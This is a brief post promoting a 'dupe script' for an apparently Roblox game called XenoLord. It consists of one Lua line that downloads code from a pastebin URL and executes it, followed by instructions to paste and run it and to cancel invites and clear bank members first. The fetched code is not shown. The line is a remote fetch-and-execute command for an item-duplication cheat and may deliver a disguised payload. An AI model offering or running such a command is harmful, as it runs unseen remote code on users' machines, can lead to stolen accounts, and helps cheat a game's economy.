XenoLord new dupe script (easter update) 

loadstring(game:HttpGet("https://pastebin.com/raw/MaavrBSR"))()

copy and paste the script and execute

dont forgett cancel all outgoing invites
dont forget to remove ur bank members (if u have)
ur bank must me t2 - t8
